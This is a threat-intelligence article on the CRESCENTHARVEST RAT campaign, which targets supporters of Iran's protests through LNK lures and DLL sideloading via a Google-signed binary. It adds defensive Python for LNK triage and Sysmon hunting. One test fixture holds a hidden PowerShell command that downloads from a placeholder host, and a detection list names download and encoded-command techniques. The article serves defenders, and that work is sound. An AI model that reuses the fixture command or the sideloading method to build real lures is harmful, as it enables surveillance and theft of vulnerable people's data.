CRESCENTHARVEST Campaign Deploys RAT Malware Against Iran Protest Supporters Using DLL Sideloading via Signed Google Binary
Acronis Threat Research Unit (TRU) has disclosed a new espionage campaign dubbed CRESCENTHARVEST that targets supporters of Iran's ongoing protests with a custom remote access trojan designed for long-term surveillance and data theft.
The campaign, observed since January 9, 2026, is believed to be the work of an Iran-aligned threat group, though no formal attribution has been made. It marks the second espionage operation identified targeting individuals connected to the Iranian protest movement — following HarfangLab's discovery last month of the RedKitten campaign deploying the SloppyMIO backdoor against human rights organizations.
Protest-Themed Lures in Farsi
The attackers distribute malicious RAR archives containing what appears to be legitimate protest-related content — images, videos, and a Farsi-language report providing updates from "the rebellious cities of Iran." The pro-protest framing is deliberate, designed to attract Farsi-speaking Iranians seeking information about the demonstrations.
Hidden among the legitimate media are Windows shortcut files that use the double extension trick (.jpg.lnk or .mp4.lnk) to pose as images or videos; because Explorer never displays the .lnk extension, such a file shows up as photo.jpg or clip.mp4 regardless of the user's "hide extensions" setting. When launched, the LNK file runs PowerShell code that retrieves a secondary ZIP archive while opening a harmless image or video, so the victim sees nothing unusual.
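As an added illustration (this is not code from the Acronis report), the Python below parses a shortcut's header and StringData per the MS-SHLLINK layout and flags the traits described above: a media-like double extension, a minimised start window, and PowerShell arguments that fetch from the network and spawn a second process. The sample LNK is constructed inside the block with a placeholder URL; the pattern lists, the extension list and the cp1252 fallback for non-Unicode strings are assumptions, not indicators taken from the report.

```python
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) that govern which StringData fields follow the header
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # window starts minimised and unfocused: the user sees nothing

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]


def parse_lnk(data: bytes) -> dict:
    """Parse ShellLinkHeader and StringData of a .lnk; IDList/LinkInfo are skipped, ExtraData ignored."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad HeaderSize or CLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) followed by the ItemIDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:            # LinkInfoSize (4 bytes) covers the whole LinkInfo structure
        off += struct.unpack_from("<I", data, off)[0]
    for field, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        if len(raw) != count * width:
            raise ValueError(f"truncated {field}")
        off += count * width
        # assumption: ANSI strings decoded as cp1252; real files use the system code page
        info[field] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return info


# Assumed patterns for media-disguised downloader shortcuts (not indicators from the report)
DOUBLE_EXT = re.compile(r"\.(jpe?g|png|gif|bmp|mp4|avi|mov|mkv|pdf|docx?)\.lnk$", re.I)
SUSPICIOUS_ARGS = [
    (r"powershell|pwsh", "launches PowerShell"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-e(nc(odedcommand)?)?\b", "encoded command"),
    (r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|bitsadmin|https?://", "fetches content from the network"),
    (r"start-process|invoke-item", "spawns a second process (decoy or payload)"),
]


def triage_lnk(filename: str, data: bytes) -> list:
    """Return the reasons a shortcut looks like a media-disguised downloader; empty list means nothing odd."""
    findings = []
    if DOUBLE_EXT.search(filename):
        findings.append("double extension disguises LNK as media")
    info = parse_lnk(data)
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE")
    target = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    for pattern, label in SUSPICIOUS_ARGS:
        if re.search(pattern, target):
            findings.append(label)
    return findings


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Construct a minimal LNK (no IDList, no LinkInfo) as a test fixture; real lures carry more structures."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (0x3C - len(header))                   # FileAttributes .. IconIndex zeroed
    header += struct.pack("<I", show_command) + b"\x00" * 12  # HotKey + Reserved1..3
    body = b""
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed samples: the shape of the lure described above, with a placeholder URL, plus a benign shortcut
LURE_NAME = "protest_update_01.jpg.lnk"
LURE_BYTES = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r'-w hidden -c "iwr http://example.invalid/u.zip -OutFile $env:TEMP\u.zip; Start-Process $env:TEMP\decoy.jpg"',
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_NAME = "notes.lnk"
BENIGN_BYTES = build_lnk(r"..\..\..\Windows\System32\notepad.exe", r"C:\Users\me\notes.txt")

if __name__ == "__main__":
    for name, blob in ((LURE_NAME, LURE_BYTES), (BENIGN_NAME, BENIGN_BYTES)):
        print(name, "->", triage_lnk(name, blob) or "clean")
```

Run it against every .lnk extracted from a suspect archive; a hit on the double-extension check alone is already worth quarantining, since no legitimate media file needs to be a shortcut.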
The initial access vector remains unknown, but Acronis suspects spear-phishing or extended social engineering operations where attackers build rapport with targets before delivering the payload — a well-documented tactic used by Iranian groups like Charming Kitten and Tortoiseshell, who have maintained fake personas for years before weaponizing the relationship.
Signed Binary Abuse and DLL Sideloading
The infection chain leverages a legitimate Google-signed binary, software_reporter_tool.exe (part of Chrome's cleanup utility), to sideload two malicious DLLs planted in its DLL search path. Because the host process carries a valid Google signature, the attacker's code runs inside a trusted parent and slips past controls that key only on the executable's signature:
urtcbased140d_d.dll — a C++ implant that extracts and decrypts Chrome's app-bound encryption keys through COM interfaces, sharing code with the open-source ChromElevator project
version.dll (CRESCENTHARVEST) — the primary RAT, capable of:
- Enumerating installed antivirus products and security tools
- Harvesting system metadata, browser credentials, and cookies
- Stealing Telegram desktop session data
- Keylogging
- Listing directories and uploading files
- Running shell commands
- Performing anti-analysis checks
The RAT communicates with its C2 server at servicelog-information[.]com through the Windows WinHTTP API, so its beacons look like ordinary HTTP(S) traffic from a Windows process and are hard to separate from legitimate web activity at the network layer.
Supported C2 Commands
The implant supports a structured command set including Anti (anti-analysis), His (browser history theft), KeyLog (keylogger activation), Tel_s (Telegram session theft), Cook (cookie theft), F_log (credential harvesting), Upload (file exfiltration), and shell (command execution). Notably, the PowerShell execution command (ps) was found to be non-functional in the analyzed sample.
IOCs
- C2 domain: servicelog-information[.]com
- Sideloaded binary: software_reporter_tool.exe (legitimate, Google-signed)
- Malicious DLLs: urtcbased140d_d.dll, version.dll
- Lure format: RAR archives containing .jpg.lnk and .mp4.lnk files alongside legitimate media
Defender Recommendations
- Block LNK execution from archive extractions — flag PowerShell spawned from shortcut files
- Monitor for DLL sideloading: alert on unsigned DLLs loaded by signed Google binaries
- Hunt for WinHTTP-based C2: inspect outbound connections from software_reporter_tool.exe
- Protect Telegram desktop sessions: monitor for unauthorized access to Telegram's tdata directory
- Brief at-risk communities: organizations supporting the Iranian diaspora and protest movements should implement heightened security awareness
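To make the sideloading and WinHTTP-C2 recommendations concrete, here is an added Python example (not from the report or from Acronis) that runs two hunt rules over Sysmon-style events: Event ID 7 image loads into software_reporter_tool.exe that are unsigned, signed by an unexpected party, or resolve version.dll outside the system directories, and Event ID 3 connections from that process to hosts outside an expected-destination list. The event records, the staging path, the signer and destination allowlists and the IP addresses are constructed assumptions to be tuned against a clean baseline of your own hosts.

```python
import ntpath

HOST_BINARY = "software_reporter_tool.exe"
SYSTEM_DLL_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Assumptions to tune from a baseline of clean hosts: signers the tool is expected to load,
# and destinations its own telemetry is expected to reach.
EXPECTED_SIGNERS = ("google", "microsoft")
EXPECTED_DEST_SUFFIXES = (".google.com", ".googleapis.com", ".gstatic.com")


def _is_host_binary(ev: dict) -> bool:
    return ntpath.basename(ev.get("Image", "")).lower() == HOST_BINARY


def check_image_load(ev: dict):
    """Sysmon Event 7: DLL loaded into the Google-signed host. Returns reasons, or None if clean."""
    if ev.get("EventID") != 7 or not _is_host_binary(ev):
        return None
    dll = ev.get("ImageLoaded", "")
    dll_dir = ntpath.dirname(dll).lower()
    validly_signed = (ev.get("Signed", "").lower() == "true"
                      and ev.get("SignatureStatus", "") == "Valid")
    signer = ev.get("Signature", "").lower()
    reasons = []
    if not validly_signed:
        reasons.append("unsigned or invalidly signed DLL")
    elif not any(s in signer for s in EXPECTED_SIGNERS):
        reasons.append(f"unexpected signer: {ev.get('Signature')}")
    # version.dll is a Windows system DLL; a copy resolved anywhere else is the classic sideload setup
    if ntpath.basename(dll).lower() == "version.dll" and dll_dir not in SYSTEM_DLL_DIRS:
        reasons.append("version.dll resolved outside System32/SysWOW64")
    return reasons or None


def check_network(ev: dict):
    """Sysmon Event 3: outbound connection from the host binary to a destination outside its baseline."""
    if ev.get("EventID") != 3 or not _is_host_binary(ev):
        return None
    host = ev.get("DestinationHostname", "").lower().rstrip(".")
    if host and host.endswith(EXPECTED_DEST_SUFFIXES):
        return None
    dest = host or ev.get("DestinationIp")
    return [f"connection to {dest}:{ev.get('DestinationPort')} outside expected destinations"]


def hunt(events: list) -> list:
    """Run both rules over Sysmon-style event dicts; return (index, rule name, reasons) for each hit."""
    hits = []
    for i, ev in enumerate(events):
        for rule in (check_image_load, check_network):
            reasons = rule(ev)
            if reasons:
                hits.append((i, rule.__name__, reasons))
    return hits


# Constructed events (field names follow Sysmon's schema; paths, signers and IPs are illustrative)
STAGING = r"C:\Users\victim\AppData\Local\Temp\update"


def staged(name: str) -> str:
    return ntpath.join(STAGING, name)


UNSIGNED = {"Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"}
EVENTS = [
    {"EventID": 7, "Image": staged(HOST_BINARY), "ImageLoaded": r"C:\Windows\System32\version.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": staged(HOST_BINARY), "ImageLoaded": staged("version.dll"), **UNSIGNED},
    {"EventID": 7, "Image": staged(HOST_BINARY), "ImageLoaded": staged("urtcbased140d_d.dll"), **UNSIGNED},
    {"EventID": 3, "Image": staged(HOST_BINARY), "DestinationHostname": "servicelog-information.com",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 3, "Image": staged(HOST_BINARY), "DestinationHostname": "clients2.google.com",
     "DestinationIp": "203.0.113.20", "DestinationPort": 443},
    {"EventID": 7, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ImageLoaded": staged("version.dll"), **UNSIGNED},
]

if __name__ == "__main__":
    for idx, rule, reasons in hunt(EVENTS):
        print(f"event {idx} [{rule}]: {'; '.join(reasons)}")
```

The signed system copy of version.dll (event 0) and the telemetry connection (event 4) pass, while the two unsigned DLLs beside the copied binary and the beacon to the C2 domain fire. When wiring this into a SIEM, key the destination allowlist on what the tool actually contacts in your environment rather than on the suffixes assumed here.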